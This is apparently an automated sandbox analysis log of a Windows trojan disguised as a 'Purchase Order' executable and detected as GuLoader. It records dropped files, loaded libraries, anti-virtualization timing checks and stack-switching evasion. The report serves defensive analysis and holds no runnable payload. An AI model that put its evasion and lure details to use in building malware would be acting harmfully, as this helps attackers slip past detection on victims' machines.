      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F03E611_2_348F03E6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483E3F011_2_3483E3F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EA35211_2_348EA352
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D0CB511_2_348D0CB5
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34820CF211_2_34820CF2
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34830C0011_2_34830C00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483EC6011_2_3483EC60
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34848DBF11_2_34848DBF
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483AD0011_2_3483AD00
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CCD1F11_2_348CCD1F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34842E9011_2_34842E90
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348ECE9311_2_348ECE93
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EEEDB11_2_348EEEDB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EEE2611_2_348EEE26
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34830E5911_2_34830E59
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348AEFA011_2_348AEFA0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34822FC811_2_34822FC8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483CFE011_2_3483CFE0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34872F2811_2_34872F28
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34850F3011_2_34850F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348D2F3011_2_348D2F30
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A4F4011_2_348A4F40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348168B811_2_348168B8
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3485E8F011_2_3485E8F0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483A84011_2_3483A840
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3483284011_2_34832840
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348329A011_2_348329A0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484696211_2_34846962
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3482EA8011_2_3482EA80
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EEB8911_2_348EEB89
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348E6BD711_2_348E6BD7
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348EAB4011_2_348EAB40
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 348AF290 appears 102 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3481B970 appears 244 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 34877E54 appears 94 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 3489EA12 appears 70 times
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: String function: 34865130 appears 56 times
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.0000000034AC1000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.00000000345B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.0000000034769000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order Purchase Order Purchase Order Purchase Order.exe
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal88.troj.evad.winEXE@3/8@0/1
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_0040338F EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_0040338F
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00404722 GetDlgItem,SetWindowTextW,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,LdrInitializeThunk,MulDiv,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,SetDlgItemTextW,5_2_00404722
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,LdrInitializeThunk,5_2_00402104
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumpsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsk58B4.tmpJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeReversingLabs: Detection: 27%
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile read: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess created: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Gullis.lnk.5.drLNK file: ..\..\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\lensaftalerne.sla
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp
      Source: Binary string: wntdll.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322463653.000000003448D000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2324475772.000000003463C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000001.1905312342.0000000000649000.00000008.00000001.01000000.00000006.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000005.00000002.1914988033.0000000003FC1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_73CF1B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,5_2_73CF1B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_73CF2FD0 push eax; ret 5_2_73CF2FFE
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348209AD push ecx; mov dword ptr [esp], ecx11_2_348209B6
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: \purchase order purchase order purchase order purchase order.exe
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: \purchase order purchase order purchase order purchase order.exeJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumpsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\VedbendensJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Vedbendens\Hoveddelenes.haaJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\ClapJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Clap\Exoascaceous73.traJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\TidenderneJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Atomizing.EftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Underemphasizing70.tioJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\sulkens.dicJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\KlapperesJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes\vec.jpgJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI/Special instruction interceptor: Address: 477F6B9
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI/Special instruction interceptor: Address: 334F6B9
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeRDTSC instruction interceptor: First address: 4743B9E second address: 4743B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC4758BE106h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeRDTSC instruction interceptor: First address: 3313B9E second address: 3313B9E instructions: 0x00000000 rdtsc 0x00000002 test ah, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FC474D025D6h 0x00000008 inc ebp 0x00000009 test dh, dh 0x0000000b inc ebx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D1C0 rdtsc 11_2_3489D1C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk59ED.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI coverage: 0.3 %
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,5_2_004059CC
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_004065FD FindFirstFileW,FindClose,5_2_004065FD
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_00402868 FindFirstFileW,5_2_00402868
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668967160.00000000046DD000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000002.2668899476.0000000004688000.00000004.00000020.00020000.00000000.sdmp, Purchase Order Purchase Order Purchase Order Purchase Order.exe, 0000000B.00000003.2322679652.00000000046DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_5-4362
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeAPI call chain: ExitProcess graph end nodegraph_5-4366
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3489D1C0 rdtsc 11_2_3489D1C0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_0040264A MultiByteToWideChar,ReadFile,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,LdrInitializeThunk,MultiByteToWideChar,SetFilePointer,5_2_0040264A
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 5_2_73CF1B63 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,5_2_73CF1B63
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34829486 mov eax, dword ptr fs:[00000030h]11_2_34829486
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34829486 mov eax, dword ptr fs:[00000030h]11_2_34829486
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348174B0 mov eax, dword ptr fs:[00000030h]11_2_348174B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348174B0 mov eax, dword ptr fs:[00000030h]11_2_348174B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348534B0 mov eax, dword ptr fs:[00000030h]11_2_348534B0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348F54DB mov eax, dword ptr fs:[00000030h]11_2_348F54DB
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348C94E0 mov eax, dword ptr fs:[00000030h]11_2_348C94E0
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_3484340D mov eax, dword ptr fs:[00000030h]11_2_3484340D
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348A7410 mov eax, dword ptr fs:[00000030h]11_2_348A7410
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB450 mov eax, dword ptr fs:[00000030h]11_2_348CB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB450 mov eax, dword ptr fs:[00000030h]11_2_348CB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB450 mov eax, dword ptr fs:[00000030h]11_2_348CB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348CB450 mov eax, dword ptr fs:[00000030h]11_2_348CB450
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_348DF453 mov eax, dword ptr fs:[00000030h]11_2_348DF453
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821460 mov eax, dword ptr fs:[00000030h]11_2_34821460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821460 mov eax, dword ptr fs:[00000030h]11_2_34821460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821460 mov eax, dword ptr fs:[00000030h]11_2_34821460
      Source: C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exeCode function: 11_2_34821460 mov eax, dword ptr fs:[00000030h]11_2_34821460
